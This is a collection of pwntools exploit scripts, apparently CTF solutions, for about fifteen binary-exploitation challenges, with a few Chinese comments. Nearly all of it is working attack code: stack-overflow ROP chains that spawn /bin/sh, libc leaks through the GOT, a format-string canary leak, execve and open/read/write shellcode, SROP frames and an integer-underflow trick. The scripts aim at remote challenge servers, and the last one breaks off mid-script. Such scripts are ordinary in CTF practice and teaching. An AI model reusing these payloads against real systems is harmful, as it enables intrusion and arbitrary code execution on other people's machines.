libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 63625
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
sys_addr=0x401236
ret=0x40101a
payload=b'meow'+b'\x00'*0x24+p64(ret)+p64(sys_addr)
io.recvuntil(b'say?')
io.sendline(payload)
io.recvuntil(b'it?')
io.sendline(str(len(payload)))


io.interactive()

0x15 syslock

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 51017
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
pop_rax_ret=0x401244
syscall=0x401230
pop_rdi_rsi_rdx_ret=0x401240
ret=0x40101a
binsh=0x404084

io.recvuntil(b'mode\n')
io.send(b'-32')

io.recvuntil(b'password\n')
payload=p32(59)+b'/bin/sh\x00'
io.send(payload)

io.recvuntil(b'Mode.\n')
payload=b'A'*0x48+p64(pop_rax_ret)+p64(59)+p64(pop_rdi_rsi_rdx_ret)+p64(binsh)+p64(0)+p64(0)+p64(syscall)
io.send(payload)

io.interactive()

0x16 xdulaker

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59912
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
menu = b'>'

io.recvuntil(menu)
io.sendline(b'1')
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
elf_base = leak_addr - 0x4010
log.success("elf_base --> "+hex(elf_base))
backdoor = elf_base + 0x1249
ret = elf_base + 0x0101a

key = b'xdulaker'
io.recvuntil(menu)
io.sendline(b'2')
io.send(key*8)

io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'xdulaker')
payload = b'a'*0x38 + p64(ret) + p64(backdoor)
io.sendline(payload)

io.interactive()

0x17 calc_beta

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 23011
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

def show():
    io.recvuntil(b'5. Exit')
    io.recvuntil(b'> ')
    io.sendline(b'1')

def edit(idx, data):
    io.recvuntil(b'5. Exit')
    io.recvuntil(b'> ')
    io.sendline(b'2')
    io.recvuntil(b'Which number?')
    io.recvuntil(b'> ')
    io.sendline(str(idx).encode())
    io.recvuntil(b'Change to what?')
    io.recvuntil(b'> ')
    io.sendline(str(data).encode())

# pwn :)
# 0x0000000000401253 : pop rdi ; ret
# 0x0000000000401251 : pop rsi ; pop r15 ; ret

#.text:000000000040124A                 pop     rbx
#.text:000000000040124B                 pop     rbp
#.text:000000000040124C                 pop     r12
#.text:000000000040124E                 pop     r13
#.text:0000000000401250                 pop     r14
#.text:0000000000401252                 pop     r15
#.text:0000000000401254                 retn

#.text:0000000000401230                 mov     rdx, r15
#.text:0000000000401233                 mov     rsi, r14
#.text:0000000000401236                 mov     edi, r13d
#.text:0000000000401239                 call    ds:(__frame_dummy_init_array_entry - 601E10h)[r12+rbx*8]
#.text:000000000040123D                 add     rbx, 1
#.text:0000000000401241                 cmp     rbp, rbx
#.text:0000000000401244                 jnz     short loc_401230

pop_rdi_ret = 0x401253
pop_rsi_r15_ret = 0x401251
ret = pop_rdi_ret + 1
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x4010b4 + 1
#puts_plt = elf.plt['puts']
#puts_got = elf.got['puts']

edit(1, 0x40124A)
edit(2, 0)
edit(3, 1)
edit(4, write_got)
edit(5, 1)
edit(6, write_got)
edit(7, 0x100)
edit(8, 0x401230)
edit(9, 0)
edit(10, 0)
edit(11, 0)
edit(12, 0)
edit(13, 0)
edit(14, 0)
edit(15, 0)
edit(16, main)
edit(0, ret)

leak_addr = u64(io.recv(6).ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['write']
log.info("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

edit(1, pop_rdi_ret)
edit(2, binsh)
#edit(3, ret)
edit(3, system)
edit(0, ret)

io.interactive()

0x18 calc_meow

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 21281
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
# 0x555555554000 num0 = 0x555555555cae

def show():
    io.recvuntil(b'>')
    io.sendline(b'1')

def edit(idx, data):
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx).encode())
    io.recvuntil(b'>')
    io.sendline(str(data).encode())

def clean():
    io.recvuntil(b'>')
    io.sendline(b'3')

def go_calc():
    io.recvuntil(b'>')
    io.sendline(b'4')

def add(idx1, idx2, res_idx):
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())

def sub(idx1, idx2, res_idx):
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())

def exit_calc():
    io.recvuntil(b'>')
    io.sendline(b'6')

def ret():
    io.recvuntil(b'>')
    io.sendline(b'5')

base = 0x555555555cda - 0x555555554000 # 0x1cae
pop_rdi_nop_ret = 0x1d11
ret = pop_rdi_nop_ret + 2
puts_plt = elf.plt['puts'] # 0x10d4
puts_got = elf.got['puts'] # 0x3f90
log.info("puts_plt --> "+hex(puts_plt))
log.info("puts_got --> "+hex(puts_got))
main = 0x1be5 
start = 0x1160

edit(1, pop_rdi_nop_ret - base) # 负溢的num[0]存放着elf地址，根据与其的偏移来先布置好num数组的值
edit(2, puts_got - base)
edit(3, puts_plt - base)
edit(4, start - base)
edit(5, ret - base)

go_calc()

add(0, 1, 1) # 通过add来计算出正确地址，利用puts来leak出libc
add(0, 2, 2)
add(0, 3, 3)
add(0, 4, 4) # 返回start重新回到main中
add(0, 5, 0)

exit_calc() # 返回，这时候返回地址已经被修改为ret，也就顺着往下执行了ROPchain

leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> "+hex(libc_base))

pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search('/bin/sh'))

# 直接布置ropchain
edit(1, pop_rdi_ret)
edit(2, binsh)
edit(3, system)
edit(0, ret)

io.interactive()

0x19 计算喵的复仇

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.57.152"
port = 20934
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
# 0x555555554000 num0 = 0x555555555cae

def show():
    io.recvuntil(b'>')
    io.sendline(b'1')

def edit(idx, data):
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx).encode())
    io.recvuntil(b'>')
    io.sendline(str(data).encode())

def clean():
    io.recvuntil(b'>')
    io.sendline(b'3')

def go_calc():
    io.recvuntil(b'>')
    io.sendline(b'4')

def add(idx1, idx2, res_idx):
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())

def sub(idx1, idx2, res_idx):
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b'>')
    io.sendline(str(idx1).encode())
    io.recvuntil(b'>')
    io.sendline(str(idx2).encode())
    io.recvuntil(b'>')
    io.sendline(str(res_idx).encode())

def exit_calc():
    io.recvuntil(b'>')
    io.sendline(b'6')

def ret():
    io.recvuntil(b'>')
    io.sendline(b'5')

base = 0x555555555e53 - 0x555555554000 # 0x1e53
pop_rdi_nop_ret = 0x1e8a
pop_rbp_ret = 0x1233
ret = pop_rdi_nop_ret + 2
puts_plt = elf.plt['puts']
puts_got = elf.got['puts'] 
log.info("puts_plt --> "+hex(puts_plt))
log.info("puts_got --> "+hex(puts_got))
main = 0x1d5e 
start = 0x1160
magic_puts = 0x1e75
call_read = 0x12db
calc = 0x1cb2
edit_num = 0x14d5

go_calc()
add(0, 1, 1)
exit_calc()

show()

io.recvuntil(b'num1 = ')
leak_addr = int(io.recv(15), 10) 
elf_base = leak_addr - 0x1e53
log.info("elf_base --> "+hex(elf_base))

edit(0, elf_base + call_read)

payload = b'a'*0x8 + p64(elf_base + ret) + p64(elf_base + pop_rdi_nop_ret) +\
        p64(elf_base + puts_got) + p64(elf_base + puts_plt) + p64(elf_base + call_read)
io.send(payload)

leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> "+hex(libc_base))

pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search('/bin/sh'))

payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.send(payload)

io.interactive()

0x1a fmt_canary

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 16586
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
payload = b'%11$p%33$p' 
io.sendline(payload)

io.recvuntil(b'0x')
canary = int(io.recv(16), 16)
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
libc_base = leak_addr - 128 - libc.sym['__libc_start_main']
log.info("libc_base --> "+hex(libc_base))
log.info("canary --> "+hex(canary))

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search('/bin/sh'))
pop_rdi_ret = libc_base + 0x2a3e5
ret = pop_rdi_ret + 1

io.sendline(b'end')

payload = b'a'*0x28 + p64(canary)*2 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.sendline(payload)

io.interactive()

0x1b input_function

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 13668
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
shellcode = asm('''
    xor 	rsi, rsi
    push	rsi	
    mov 	rdi, 0x68732f2f6e69622f
    push	rdi
    push	rsp		
    pop	    rdi			
    mov 	al,	59	
    cdq				
    syscall
''')

io.send(shellcode)

io.interactive()

0x1c input_small_function

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "47.94.87.199"
port = 22770
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
shellcode = asm('''	
    push rsi
    mov 	rdi, 0x68732f2f6e69622f
    push	rdi
    push	rsp		
    pop	    rdi			
    mov 	al,	59	
    cdq				
    syscall
''')

io.send(shellcode)

io.interactive()

0x1d int_bug

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 19832
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
for _ in range(0x7fff):
    io.sendline(b'1')
io.sendline(b'1')

io.interactive()

0x1e noshell

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "47.94.87.199"
port = 24869
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)

# 0x00000000004013f3 : pop rdi ; ret
# 0x00000000004013f7 : pop rdx ; ret
# 0x00000000004013f5 : pop rsi ; ret
# 0x000000000040101a : ret

pop_rdi_ret = 0x4013f3
pop_rsi_ret = 0x4013f5
pop_rdx_ret = 0x4013f7
ret = 0x40101a
open_addr = elf.plt['open']
write_addr = elf.plt['write']
read_addr = elf.plt['read']

rw =  0x404800
#flag = 0x402034
flag = 0x40206a

payload = b'a'*0x28 + p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0) + p64(open_addr) +\
        p64(pop_rdi_ret) + p64(5) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(read_addr) +\
        p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100) + p64(write_addr)

io.recvuntil(b'something?')
io.sendline(b'n')
io.recvuntil(b'flag?')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'2')
io.recvuntil(b'choice:')
io.sendline(b'1')
io.recvuntil(b'something')
io.send(payload.ljust(0x100, b'\x00'))

io.interactive()

0x1f only_read

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 25201
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
sigret = 0x401366
syscall_ret = 0x40136d
main = 0x401373
rw = 0x404000
leave_ret = 0x401360
call_read = 0x401349

sigFrame = SigreturnFrame()
sigFrame.rax = 2
sigFrame.rdi = rw + 0x800 + 0x10
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall_ret
sigFrame.rsp = rw + 0x800 - 0x10
sigFrame.rbp = rw + 0x600

log.info("frame len --> "+hex(len(sigFrame)))
log.info("sigframe --> "+hexdump(sigFrame))

payload = b'a'*0x10 + p64(rw + 0x800) + p64(call_read)
io.send(payload.ljust(0x100, b'\x00'))

payload = p64(call_read) + p64(sigret) + p64(rw + 0x800 - 0x10) + p64(leave_ret) + b'./flag\x00\x00' + bytes(sigFrame)[0x18:-0x8]
io.send(payload.ljust(0x100, b'\x00'))

sigFrame = SigreturnFrame()
sigFrame.rax = 40
sigFrame.rdi = 1
sigFrame.rsi = 3
sigFrame.rdx = 0
sigFrame.r10 = 0x100
sigFrame.rip = syscall_ret

log.info("frame len --> "+hex(len(sigFrame)))
log.info("sigframe --> "+hexdump(sigFrame))

payload = p64(rw) + p64(sigret) + p64(rw + 0x600 - 0x10) + p64(leave_ret) + bytes(sigFrame)[0x10:-0x8]
io.send(payload.ljust(0x100, b'\x00'))

io.interactive()

0x20 overflow

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 39380
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
payload = b'a'*0x100 + p64(0xdeadbeef) + p64(0x401222)
io.sendline(payload)

io.interactive()

0x21 pwndoor

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "8.147.132.32"
port = 42958
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
io.sendline(b'7038329')

io.interactive()

0x22 sandbox_plus

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 22398
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b *$rebase(0x139a)
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
shellcode = asm('''
    mov rdi, -100
    push 0x0000000067616c66
    mov rsi, rsp
    xor rdx, rdx
    xor r10, r10
    push 257
    pop rax
    syscall
    push rax
    pop rdi
    sub rsp, 0x100
    push rsp
    pop rsi
    push 0x100
    pop rdx
    xor r10, r10
    push 17
    pop rax
    syscall
    push 1
    pop rdi
    mov rsi, rsp
    push 0x100
    push rsi
    mov rsi, rsp
    push 1
    pop rdx
    push 20
    pop rax
    syscall
    nop
    nop
    nop
''')

io.recvuntil(b'please input a orw_plus function (also also after compile)')
io.send(shellcode)

io.interactive()

0x23 syscall

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='i386', log_level='debug')

filename = "pwn"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/i386/libc6_2.35-0ubuntu3.10_i386/lib/i386-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 42840
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b func
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# pwn :)
pop_eax_ret = 0x080b438a
pop_ebx_ret = 0x08049022
pop_ecx_ret = 0x0804985a
pop_edx_ret = 0x0804985c
# 0x08090955 : xor eax, eax ; mov dword ptr [ebx], ecx ; add esp, 4 ; pop ebx ; pop esi ; ret
magic = 0x080507cf
# 0x080507c9 : xor ecx, ecx ; rdsspd ecx ; mov dword ptr [edx + 0x28], ecx ; ret
# 0x080507cf : mov dword ptr [edx + 0x28], ecx ; ret
syscall = 0x0806475d
int_80 = 0x08049c0a
rw = 0x80ed000

#payload = b'a'*(0x12+4) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + b'/bin' + p32(magic) + p32(0) + p32(rw + 4) + p32(0) +\
#        p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) + p32(0) + p32(rw) + p32(0) +\
#        p32(pop_eax_ret) + p32(0xb) + p32(pop_ecx_ret) + p32(0) + p32(pop_edx_ret) + p32(0) + p32(int_80)

payload = b'a'*(0x12+4) + p32(pop_edx_ret) + p32(rw - 0x28) + p32(pop_ecx_ret) + b'/bin' + p32(magic) +\
        p32(pop_edx_ret) + p32(rw - 0x28 + 4) + p32(pop_ecx_ret) + b'/sh\x00' + p32(magic) +\
        p32(pop_eax_ret) + p32(0xb) + p32(pop_ebx_ret) + p32(rw) + p32(pop_ecx_ret) + p32(0) + p32(pop_edx_ret) + p32(0) + p32(int_80)

log.info("len --> "+hex(len(payload)))
io.recvuntil(b'guys')
io.send(payload.ljust(100, b'\x00'))

io.interactive()

0x24 小明的问题

#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "39.106.48.123"
port = 38828
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35
'''

def start():
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io1 = start()
io2 = start()
io3 = start()

# pwn :)

# 1注册普通用户
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'1')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')

# 1,2同时登录普通用户
io1.recvuntil(b'Please select your operation:')
io1.sendline(b'2')
io1.recvuntil(b'username:')
io1.sendline(b'r3t2')
io1.recvuntil(b'password')
io1.sendline(b'123')

io2.recvuntil(b'Please select your operation:')
io2.sendline(b'2')
io2.recvuntil(b'username:')
io2.sendline(b'r3t2')
io2.recvuntil(b'password')
io2.sendline(b'123')

# 1,2同时注销，使得user_count负溢导致初始root被覆盖
